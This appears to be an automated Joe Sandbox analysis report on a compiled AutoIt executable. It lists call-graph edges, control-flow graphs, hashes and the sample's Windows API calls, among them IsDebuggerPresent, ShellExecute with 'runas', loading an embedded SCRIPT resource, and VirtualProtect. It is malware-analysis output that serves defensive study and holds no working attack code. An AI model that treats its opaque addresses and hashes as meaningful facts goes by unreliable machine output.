aecc5c 86 API calls 4 library calls 96288->96347 96289->96274 96289->96276 96289->96280 96289->96283 96289->96284 96289->96285 96289->96286 96289->96288 96290 ad97ed InterlockedDecrement 96289->96290 96294 af6ff0 331 API calls 96289->96294 96295 b00d1d 96289->96295 96298 aeb55b 96289->96298 96302 b00d09 96289->96302 96305 aff0ac 96289->96305 96337 aea6ef 96289->96337 96344 afef61 82 API calls 2 library calls 96289->96344 96290->96289 96294->96289 96352 aff8ae 96295->96352 96297 b00d2d 96297->96289 96299 aeb569 96298->96299 96300 aeb564 96298->96300 96299->96289 96438 aea4d5 96300->96438 96303 aff8ae 129 API calls 96302->96303 96304 b00d19 96303->96304 96304->96289 96306 aad7f7 48 API calls 96305->96306 96307 aff0c0 96306->96307 96308 aad7f7 48 API calls 96307->96308 96309 aff0c8 96308->96309 96310 aad7f7 48 API calls 96309->96310 96311 aff0d0 96310->96311 96312 aa936c 81 API calls 96311->96312 96336 aff0de 96312->96336 96313 aa6a63 48 API calls 96313->96336 96314 aac799 48 API calls 96314->96336 96315 aff2cc 96316 aff2f9 Mailbox 96315->96316 96461 aa6b68 48 API calls 96315->96461 96316->96289 96318 aff2b3 96319 aa518c 48 API calls 96318->96319 96322 aff2c0 96319->96322 96320 aff2ce 96323 aa518c 48 API calls 96320->96323 96321 aa6eed 48 API calls 96321->96336 96325 aa510d 48 API calls 96322->96325 96326 aff2dd 96323->96326 96324 aabdfa 48 API calls 96327 aff175 CharUpperBuffW 96324->96327 96325->96315 96328 aa510d 48 API calls 96326->96328 96330 aad645 53 API calls 96327->96330 96328->96315 96329 aabdfa 48 API calls 96331 aff23a CharUpperBuffW 96329->96331 96330->96336 96460 abd922 55 API calls 2 library calls 96331->96460 96333 aa936c 81 API calls 96333->96336 96334 aa518c 48 API calls 96334->96336 96335 aa510d 48 API calls 96335->96336 96336->96313 96336->96314 96336->96315 96336->96316 96336->96318 96336->96320 96336->96321 96336->96324 96336->96329 96336->96333 96336->96334 96336->96335 96338 aea6fb 96337->96338 96339 abf4ea 48 API calls 96338->96339 96340 aea709 96339->96340 96341 aad7f7 48 API calls 96340->96341 96342 aea717 96340->96342 96341->96342 96342->96289 96343->96276 96344->96289 96345->96280 96346->96288 96347->96280 96348->96280 96349->96271 96350->96263 96351->96281 96353 aa936c 81 API calls 96352->96353 96354 aff8ea 96353->96354 96359 aff92c Mailbox 96354->96359 96388 b00567 96354->96388 96356 affb8b 96357 affcfa 96356->96357 96363 affb95 96356->96363 96424 b00688 89 API calls Mailbox 96357->96424 96359->96297 96361 aff984 Mailbox 96361->96356 96361->96359 96364 aa936c 81 API calls 96361->96364 96419 b029e8 48 API calls ___crtGetEnvironmentStringsW 96361->96419 96420 affda5 60 API calls 2 library calls 96361->96420 96362 affd07 96362->96363 96365 affd13 96362->96365 96401 aff70a 96363->96401 96364->96361 96365->96359 96370 affbc9 96415 abed18 96370->96415 96373 affbfd 96376 abc050 48 API calls 96373->96376 96374 affbe3 96421 aecc5c 86 API calls 4 library calls 96374->96421 96378 affc14 96376->96378 96377 affbee GetCurrentProcess TerminateProcess 96377->96373 96380 ab1b90 48 API calls 96378->96380 96387 affc3e 96378->96387 96379 affd65 96379->96359 96384 affd7e FreeLibrary 96379->96384 96381 affc2d 96380->96381 96422 b0040f 105 API calls _free 96381->96422 96383 ab1b90 48 API calls 96383->96387 96384->96359 96387->96379 96387->96383 96423 aadcae 50 API calls Mailbox 96387->96423 96425 b0040f 105 API calls _free 96387->96425 96389 aabdfa 48 API calls 96388->96389 96390 b00582 CharLowerBuffW 96389->96390 96426 ae1f11 96390->96426 96394 aad7f7 48 API calls 96395 b005bb 96394->96395 96433 aa69e9 48 API calls ___crtGetEnvironmentStringsW 96395->96433 96397 b005d2 96398 aab18b 48 API calls 96397->96398 96399 b005de Mailbox 96398->96399 96400 b0061a Mailbox 96399->96400 96434 affda5 60 API calls 2 library calls 96399->96434 96400->96361 96402 aff725 96401->96402 96406 aff77a 96401->96406 96403 abf4ea 48 API calls 96402->96403 96405 aff747 96403->96405 96404 abf4ea 48 API calls 96404->96405 96405->96404 96405->96406 96407 b00828 96406->96407 96408 b00a53 Mailbox 96407->96408 96414 b0084b _strcat _wcscpy __NMSG_WRITE 96407->96414 96408->96370 96409 aacf93 58 API calls 96409->96414 96410 aad286 48 API calls 96410->96414 96411 aa936c 81 API calls 96411->96414 96412 ac395c 47 API calls __malloc_crt 96412->96414 96414->96408 96414->96409 96414->96410 96414->96411 96414->96412 96437 ae8035 50 API calls __NMSG_WRITE 96414->96437 96416 abed2d 96415->96416 96417 abedc5 VirtualProtect 96416->96417 96418 abed93 96416->96418 96417->96418 96418->96373 96418->96374 96419->96361 96420->96361 96421->96377 96422->96387 96423->96387 96424->96362 96425->96387 96427 ae1f3b __NMSG_WRITE 96426->96427 96428 ae1f79 96427->96428 96430 ae1f6f 96427->96430 96432 ae1ffa 96427->96432 96428->96394 96428->96399 96430->96428 96435 abd37a 60 API calls 96430->96435 96432->96428 96436 abd37a 60 API calls 96432->96436 96433->96397 96434->96400 96435->96430 96436->96432 96437->96414 96439 aea4ec 96438->96439 96440 aea5ee 96438->96440 96441 aea5d4 Mailbox 96439->96441 96443 aea58b 96439->96443 96446 aea4fd 96439->96446 96440->96299 96442 abf4ea 48 API calls 96441->96442 96453 aea54c Mailbox ___crtGetEnvironmentStringsW 96442->96453 96444 abf4ea 48 API calls 96443->96444 96444->96453 96445 aea51a 96448 aea555 96445->96448 96449 aea545 96445->96449 96445->96453 96446->96445 96447 abf4ea 48 API calls 96446->96447 96447->96445 96452 abf4ea 48 API calls 96448->96452 96451 abf4ea 48 API calls 96449->96451 96450 abf4ea 48 API calls 96450->96440 96451->96453 96454 aea55b 96452->96454 96453->96450 96458 ae9d2d 48 API calls 96454->96458 96456 aea567 96459 abe65e 50 API calls 96456->96459 96458->96456 96459->96453 96460->96336 96461->96316

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 745 acb043-acb080 call acf8a0 748 acb089-acb08b 745->748 749 acb082-acb084 745->749 750 acb0ac-acb0d9 748->750 751 acb08d-acb0a7 call ac7bda call ac7c0e call ac6e10 748->751 752 acb860-acb86c call aca70c 749->752 754 acb0db-acb0de 750->754 755 acb0e0-acb0e7 750->755 751->752 754->755 758 acb10b-acb110 754->758 759 acb0e9-acb100 call ac7bda call ac7c0e call ac6e10 755->759 760 acb105 755->760 763 acb11f-acb12d call ad3bf2 758->763 764 acb112-acb11c call acf82f 758->764 788 acb851-acb854 759->788 760->758 775 acb44b-acb45d 763->775 776 acb133-acb145 763->776 764->763 779 acb7b8-acb7d5 WriteFile 775->779 780 acb463-acb473 775->780 776->775 778 acb14b-acb183 call ac7a0d GetConsoleMode 776->778 778->775 801 acb189-acb18f 778->801 783 acb7d7-acb7df 779->783 784 acb7e1-acb7e7 GetLastError 779->784 786 acb479-acb484 780->786 787 acb55a-acb55f 780->787 789 acb7e9 783->789 784->789 793 acb48a-acb49a 786->793 794 acb81b-acb833 786->794 790 acb565-acb56e 787->790 791 acb663-acb66e 787->791 800 acb85e-acb85f 788->800 798 acb7ef-acb7f1 789->798 790->794 799 acb574 790->799 791->794 797 acb674 791->797 802 acb4a0-acb4a3 793->802 795 acb83e-acb84e call ac7c0e call ac7bda 794->795 796 acb835-acb838 794->796 795->788 796->795 805 acb83a-acb83c 796->805 806 acb67e-acb693 797->806 808 acb856-acb85c 798->808 809 acb7f3-acb7f5 798->809 810 acb57e-acb595 799->810 800->752 811 acb199-acb1bc GetConsoleCP 801->811 812 acb191-acb193 801->812 803 acb4e9-acb520 WriteFile 802->803 804 acb4a5-acb4be 802->804 803->784 817 acb526-acb538 803->817 815 acb4cb-acb4e7 804->815 816 acb4c0-acb4ca 804->816 805->800 818 acb699-acb69b 806->818 808->800 809->794 820 acb7f7-acb7fc 809->820 821 acb59b-acb59e 810->821 813 acb440-acb446 811->813 814 acb1c2-acb1ca 811->814 812->775 812->811 813->809 822 acb1d4-acb1d6 814->822 815->802 815->803 816->815 817->798 823 acb53e-acb54f 817->823 824 acb69d-acb6b3 818->824 825 acb6d8-acb719 WideCharToMultiByte 818->825 827 acb7fe-acb810 call ac7c0e call ac7bda 820->827 828 acb812-acb819 call ac7bed 820->828 829 acb5de-acb627 WriteFile 821->829 830 acb5a0-acb5b6 821->830 833 acb1dc-acb1fe 822->833 834 acb36b-acb36e 822->834 823->793 835 acb555 823->835 836 acb6b5-acb6c4 824->836 837 acb6c7-acb6d6 824->837 825->784 839 acb71f-acb721 825->839 827->788 828->788 829->784 832 acb62d-acb645 829->832 841 acb5cd-acb5dc 830->841 842 acb5b8-acb5ca 830->842 832->798 844 acb64b-acb658 832->844 845 acb217-acb223 call ac1688 833->845 846 acb200-acb215 833->846 847 acb375-acb3a2 834->847 848 acb370-acb373 834->848 835->798 836->837 837->818 837->825 849 acb727-acb75a WriteFile 839->849 841->821 841->829 842->841 844->810 851 acb65e 844->851 866 acb269-acb26b 845->866 867 acb225-acb239 845->867 852 acb271-acb283 call ad40f7 846->852 854 acb3a8-acb3ab 847->854 848->847 848->854 855 acb75c-acb776 849->855 856 acb77a-acb78e GetLastError 849->856 851->798 871 acb289 852->871 872 acb435-acb43b 852->872 860 acb3ad-acb3b0 854->860 861 acb3b2-acb3c5 call ad5884 854->861 855->849 863 acb778 855->863 858 acb794-acb796 856->858 858->789 865 acb798-acb7b0 858->865 860->861 868 acb407-acb40a 860->868 861->784 878 acb3cb-acb3d5 861->878 863->858 865->806 873 acb7b6 865->873 866->852 875 acb23f-acb254 call ad40f7 867->875 876 acb412-acb42d 867->876 868->822 874 acb410 868->874 879 acb28f-acb2c4 WideCharToMultiByte 871->879 872->789 873->798 874->872 875->872 887 acb25a-acb267 875->887 876->872 881 acb3fb-acb401 878->881 882 acb3d7-acb3ee call ad5884 878->882 879->872 883 acb2ca-acb2f0 WriteFile 879->883 881->868 882->784 890 acb3f4-acb3f5 882->890 883->784 886 acb2f6-acb30e 883->886 886->872 889 acb314-acb31b 886->889 887->879 889->881 891 acb321-acb34c WriteFile 889->891 890->881 891->784 892 acb352-acb359 891->892 892->872 893 acb35f-acb366 892->893 893->881
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2144486728.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                                • Associated: 00000000.00000002.2144466799.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144539500.0000000000B2D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144539500.0000000000B4E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144586478.0000000000B5A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144602971.0000000000B64000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_aa0000_MGQeZjDXc3.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 18c9fd59119becf4f9aa2fa0235e52cb7b157073701ae78b068faef3c719c82f
                                                • Instruction ID: 8ef37024fbc7ca71e6d911498b0b6be924971bb7da065b86d06b59548dbd421c
                                                • Opcode Fuzzy Hash: 18c9fd59119becf4f9aa2fa0235e52cb7b157073701ae78b068faef3c719c82f
                                                • Instruction Fuzzy Hash: AE326E75B122288FDB24CF58DD42BE9B7B5FB46310F1940D9E40AA7A91D7319E80CF62

                                                Control-flow Graph

                                                APIs
                                                • GetCurrentDirectoryW.KERNEL32(00007FFF,?,00000000,00000001,?,?,00AA3AA3,?), ref: 00AA3D45
                                                • IsDebuggerPresent.KERNEL32(?,?,?,?,00AA3AA3,?), ref: 00AA3D57
                                                • GetFullPathNameW.KERNEL32(00007FFF,?,?,00B61148,00B61130,?,?,?,?,00AA3AA3,?), ref: 00AA3DC8
                                                  • Part of subcall function 00AA6430: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,00AA3DEE,00B61148,?,?,?,?,?,00AA3AA3,?), ref: 00AA6471
                                                • SetCurrentDirectoryW.KERNEL32(?,?,?,00AA3AA3,?), ref: 00AA3E48
                                                • MessageBoxA.USER32(00000000,This is a third-party compiled AutoIt script.,00B528F4,00000010), ref: 00B11CCE
                                                • SetCurrentDirectoryW.KERNEL32(?,00B61148,?,?,?,?,?,00AA3AA3,?), ref: 00B11D06
                                                • GetForegroundWindow.USER32(runas,?,?,?,00000001,?,00B3DAB4,00B61148,?,?,?,?,?,00AA3AA3,?), ref: 00B11D89
                                                • ShellExecuteW.SHELL32(00000000,?,?,?,?,00AA3AA3), ref: 00B11D90
                                                  • Part of subcall function 00AA3E6E: GetSysColorBrush.USER32(0000000F), ref: 00AA3E79
                                                  • Part of subcall function 00AA3E6E: LoadCursorW.USER32(00000000,00007F00), ref: 00AA3E88
                                                  • Part of subcall function 00AA3E6E: LoadIconW.USER32(00000063), ref: 00AA3E9E
                                                  • Part of subcall function 00AA3E6E: LoadIconW.USER32(000000A4), ref: 00AA3EB0
                                                  • Part of subcall function 00AA3E6E: LoadIconW.USER32(000000A2), ref: 00AA3EC2
                                                  • Part of subcall function 00AA3E6E: RegisterClassExW.USER32(?), ref: 00AA3F30
                                                  • Part of subcall function 00AA36B8: CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 00AA36E6
                                                  • Part of subcall function 00AA36B8: CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00AA3707
                                                  • Part of subcall function 00AA36B8: ShowWindow.USER32(00000000,?,?,?,?,00AA3AA3,?), ref: 00AA371B
                                                  • Part of subcall function 00AA36B8: ShowWindow.USER32(00000000,?,?,?,?,00AA3AA3,?), ref: 00AA3724
                                                  • Part of subcall function 00AA4FFC: _memset.LIBCMT ref: 00AA5022
                                                  • Part of subcall function 00AA4FFC: Shell_NotifyIconW.SHELL32(00000000,?), ref: 00AA50CB
                                                Strings
                                                • This is a third-party compiled AutoIt script., xrefs: 00B11CC8
                                                • runas, xrefs: 00B11D84
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2144486728.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                                • Associated: 00000000.00000002.2144466799.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144539500.0000000000B2D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144539500.0000000000B4E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144586478.0000000000B5A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144602971.0000000000B64000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_aa0000_MGQeZjDXc3.jbxd
                                                Similarity
                                                • API ID: Window$IconLoad$CurrentDirectory$CreateFullNamePathShow$BrushClassColorCursorDebuggerExecuteForegroundMessageNotifyPresentRegisterShellShell__memset
                                                • String ID: This is a third-party compiled AutoIt script.$runas
                                                • API String ID: 438480954-3287110873
                                                • Opcode ID: 8b3b730ef2c879475ffa97ca81e10d9581dacdf1ed143b27b3ba02673ef6bf1a
                                                • Instruction ID: 914a95f5d3d6915db8be5738ee3e2bd986010b157ae1f4336f1144a78e422378
                                                • Opcode Fuzzy Hash: 8b3b730ef2c879475ffa97ca81e10d9581dacdf1ed143b27b3ba02673ef6bf1a
                                                • Instruction Fuzzy Hash: BC51E532904244AACF21ABB8DD46EED7BB5DB17700F0445A5F601B71E2DFB94A45CB21

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 1080 abddc0-abde4f call aad7f7 GetVersionExW call aa6a63 call abdfb4 call aa6571 1089 b124c8-b124cb 1080->1089 1090 abde55-abde56 1080->1090 1091 b124e4-b124e8 1089->1091 1092 b124cd 1089->1092 1093 abde58-abde63 1090->1093 1094 abde92-abdea2 call abdf77 1090->1094 1097 b124d3-b124dc 1091->1097 1098 b124ea-b124f3 1091->1098 1096 b124d0 1092->1096 1099 abde69-abde6b 1093->1099 1100 b1244e-b12454 1093->1100 1109 abdec7-abdee1 1094->1109 1110 abdea4-abdec1 GetCurrentProcess call abdf5f 1094->1110 1096->1097 1097->1091 1098->1096 1106 b124f5-b124f8 1098->1106 1101 b12469-b12475 1099->1101 1102 abde71-abde74 1099->1102 1104 b12456-b12459 1100->1104 1105 b1245e-b12464 1100->1105 1111 b12477-b1247a 1101->1111 1112 b1247f-b12485 1101->1112 1107 abde7a-abde89 1102->1107 1108 b12495-b12498 1102->1108 1104->1094 1105->1094 1106->1097 1113 abde8f 1107->1113 1114 b1248a-b12490 1107->1114 1108->1094 1115 b1249e-b124b3 1108->1115 1117 abdee3-abdef7 call abe00c 1109->1117 1118 abdf31-abdf3b GetSystemInfo 1109->1118 1110->1109 1132 abdec3 1110->1132 1111->1094 1112->1094 1113->1094 1114->1094 1119 b124b5-b124b8 1115->1119 1120 b124bd-b124c3 1115->1120 1127 abdf29-abdf2f GetSystemInfo 1117->1127 1128 abdef9-abdf01 call abdff4 GetNativeSystemInfo 1117->1128 1122 abdf0e-abdf1a 1118->1122 1119->1094 1120->1094 1124 abdf1c-abdf1f FreeLibrary 1122->1124 1125 abdf21-abdf26 1122->1125 1124->1125 1131 abdf03-abdf07 1127->1131 1128->1131 1131->1122 1134 abdf09-abdf0c FreeLibrary 1131->1134 1132->1109 1134->1122
                                                APIs
                                                • GetVersionExW.KERNEL32(?), ref: 00ABDDEC
                                                • GetCurrentProcess.KERNEL32(00000000,00B3DC38,?,?), ref: 00ABDEAC
                                                • GetNativeSystemInfo.KERNELBASE(?,00B3DC38,?,?), ref: 00ABDF01
                                                • FreeLibrary.KERNEL32(00000000,?,?), ref: 00ABDF0C
                                                • FreeLibrary.KERNEL32(00000000,?,?), ref: 00ABDF1F
                                                • GetSystemInfo.KERNEL32(?,00B3DC38,?,?), ref: 00ABDF29
                                                • GetSystemInfo.KERNEL32(?,00B3DC38,?,?), ref: 00ABDF35
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2144486728.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                                • Associated: 00000000.00000002.2144466799.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144539500.0000000000B2D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144539500.0000000000B4E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144586478.0000000000B5A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144602971.0000000000B64000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_aa0000_MGQeZjDXc3.jbxd
                                                Similarity
                                                • API ID: InfoSystem$FreeLibrary$CurrentNativeProcessVersion
                                                • String ID:
                                                • API String ID: 3851250370-0
                                                • Opcode ID: 405aac16adbb4e4c02c58fa3a70b68152c679bffdfbabb22be7936c50df7e7ec
                                                • Instruction ID: a641b0f71b185931bc772589d34cf2918018b3f6e2f0642331788ee843a0ee12
                                                • Opcode Fuzzy Hash: 405aac16adbb4e4c02c58fa3a70b68152c679bffdfbabb22be7936c50df7e7ec
                                                • Instruction Fuzzy Hash: 8E61A1B180A384DFCF15CF6898C15E97FB8AF2A300B2989D9D8459F34BD634C949CB65

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 1152 aa406b-aa4083 CreateStreamOnHGlobal 1153 aa40a3-aa40a6 1152->1153 1154 aa4085-aa409c FindResourceExW 1152->1154 1155 b14f16-b14f25 LoadResource 1154->1155 1156 aa40a2 1154->1156 1155->1156 1157 b14f2b-b14f39 SizeofResource 1155->1157 1156->1153 1157->1156 1158 b14f3f-b14f4a LockResource 1157->1158 1158->1156 1159 b14f50-b14f6e 1158->1159 1159->1156
                                                APIs
                                                • CreateStreamOnHGlobal.COMBASE(00000000,00000001,?,?,?,?,?,00AA449E,?,?,00000000,00000001), ref: 00AA407B
                                                • FindResourceExW.KERNEL32(?,0000000A,SCRIPT,00000000,?,?,00AA449E,?,?,00000000,00000001), ref: 00AA4092
                                                • LoadResource.KERNEL32(?,00000000,?,?,00AA449E,?,?,00000000,00000001,?,?,?,?,?,?,00AA41FB), ref: 00B14F1A
                                                • SizeofResource.KERNEL32(?,00000000,?,?,00AA449E,?,?,00000000,00000001,?,?,?,?,?,?,00AA41FB), ref: 00B14F2F
                                                • LockResource.KERNEL32(00AA449E,?,?,00AA449E,?,?,00000000,00000001,?,?,?,?,?,?,00AA41FB,00000000), ref: 00B14F42
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2144486728.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                                • Associated: 00000000.00000002.2144466799.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144539500.0000000000B2D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144539500.0000000000B4E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144586478.0000000000B5A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144602971.0000000000B64000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_aa0000_MGQeZjDXc3.jbxd
                                                Similarity
                                                • API ID: Resource$CreateFindGlobalLoadLockSizeofStream
                                                • String ID: SCRIPT
                                                • API String ID: 3051347437-3967369404
                                                • Opcode ID: 56b5681f4a83dd935c622cdc69d1c3329c37474449b7452fdac8571dd3559262
                                                • Instruction ID: 525f18b850b9f177dc5cc61355ce565115b9e27dfa4ee0621ce8c36ba0131092
                                                • Opcode Fuzzy Hash: 56b5681f4a83dd935c622cdc69d1c3329c37474449b7452fdac8571dd3559262
                                                • Instruction Fuzzy Hash: 6F113C71200701BFE7318B65EC48F677BB9EBCAB51F20416CF616972A0DBB1DC019A60
                                                APIs
                                                • GetFileAttributesW.KERNELBASE(?,00B12F49), ref: 00AE6CB9
                                                • FindFirstFileW.KERNELBASE(?,?), ref: 00AE6CCA
                                                • FindClose.KERNEL32(00000000), ref: 00AE6CDA
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2144486728.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                                • Associated: 00000000.00000002.2144466799.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144539500.0000000000B2D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144539500.0000000000B4E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144586478.0000000000B5A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144602971.0000000000B64000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_aa0000_MGQeZjDXc3.jbxd
                                                Similarity
                                                • API ID: FileFind$AttributesCloseFirst
                                                • String ID:
                                                • API String ID: 48322524-0
                                                • Opcode ID: 7d25cf05ce286deaa204e5741a00f7b760fe3f896c7505c8126335d1746905d5
                                                • Instruction ID: cf8d4c7ba4ca3a5a291aad11ec28cae22a4d3a4e9ccd3cbea70f21873b47c644
                                                • Opcode Fuzzy Hash: 7d25cf05ce286deaa204e5741a00f7b760fe3f896c7505c8126335d1746905d5
                                                • Instruction Fuzzy Hash: BAE0DF31810510AB82206738EC0D8EA37ACEA5637AF200B0AF872D21E0EB70DD2186D6
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2144486728.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                                • Associated: 00000000.00000002.2144466799.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144539500.0000000000B2D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144539500.0000000000B4E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144586478.0000000000B5A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144602971.0000000000B64000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_aa0000_MGQeZjDXc3.jbxd
                                                Similarity
                                                • API ID: Exception@8Throwstd::exception::exception
                                                • String ID: @
                                                • API String ID: 3728558374-2766056989
                                                • Opcode ID: 4516abee2375c50a760d272d26b0d91dbd418867a8edf5c0aaf6118b205547b6
                                                • Instruction ID: 84b2fa30112034dd372be4cb66e47955800361b4c5dc95548cf383a70dded4ed
                                                • Opcode Fuzzy Hash: 4516abee2375c50a760d272d26b0d91dbd418867a8edf5c0aaf6118b205547b6
                                                • Instruction Fuzzy Hash: 0672BF75D04208DFCF14DFA4C581AFEB7B9EF49300F14805AE905AB292DB75AE86CB91
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2144486728.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                                • Associated: 00000000.00000002.2144466799.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144539500.0000000000B2D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144539500.0000000000B4E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144586478.0000000000B5A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144602971.0000000000B64000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_aa0000_MGQeZjDXc3.jbxd
                                                Similarity
                                                • API ID: BuffCharUpper
                                                • String ID:
                                                • API String ID: 3964851224-0
                                                • Opcode ID: ccee18dbeeda6d22c49e1ab972955bacaf2bb02c9f0a9f13bf90464a30094ded
                                                • Instruction ID: 2c736635353de17ac1cfe9f6a1c2e5934cb1fc6a970e4fa401419280b304839f
                                                • Opcode Fuzzy Hash: ccee18dbeeda6d22c49e1ab972955bacaf2bb02c9f0a9f13bf90464a30094ded
                                                • Instruction Fuzzy Hash: 9F929B716083419FDB24DF18C590BAABBE5FF89304F14885DE88A8B392D771ED85CB52
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2144486728.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                                • Associated: 00000000.00000002.2144466799.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144539500.0000000000B2D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144539500.0000000000B4E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144586478.0000000000B5A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144602971.0000000000B64000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_aa0000_MGQeZjDXc3.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 0225162946a11c76f90452a6f63e7d4a6249661749a5d8e7796992327411a496
                                                • Instruction ID: 3ddea62bdd7974fd01394530c0ab760236d9fe1655b5820bbde6db93d3dcbd72
                                                • Opcode Fuzzy Hash: 0225162946a11c76f90452a6f63e7d4a6249661749a5d8e7796992327411a496
                                                • Instruction Fuzzy Hash: 1122AE70A04206CFDB24DF58C490AAEB7F4FF1A304F24856AE9469B391E735AD85CB91
                                                APIs
                                                • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00AAE959
                                                • timeGetTime.WINMM ref: 00AAEBFA
                                                • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00AAED2E
                                                • TranslateMessage.USER32(?), ref: 00AAED3F
                                                • DispatchMessageW.USER32(?), ref: 00AAED4A
                                                • LockWindowUpdate.USER32(00000000), ref: 00AAED79
                                                • DestroyWindow.USER32 ref: 00AAED85
                                                • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00AAED9F
                                                • Sleep.KERNEL32(0000000A), ref: 00B15270
                                                • TranslateMessage.USER32(?), ref: 00B159F7
                                                • DispatchMessageW.USER32(?), ref: 00B15A05
                                                • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00B15A19
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2144486728.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                                • Associated: 00000000.00000002.2144466799.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144539500.0000000000B2D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144539500.0000000000B4E000.00000002.00000001.01000000.00000003.sdmpDownload File
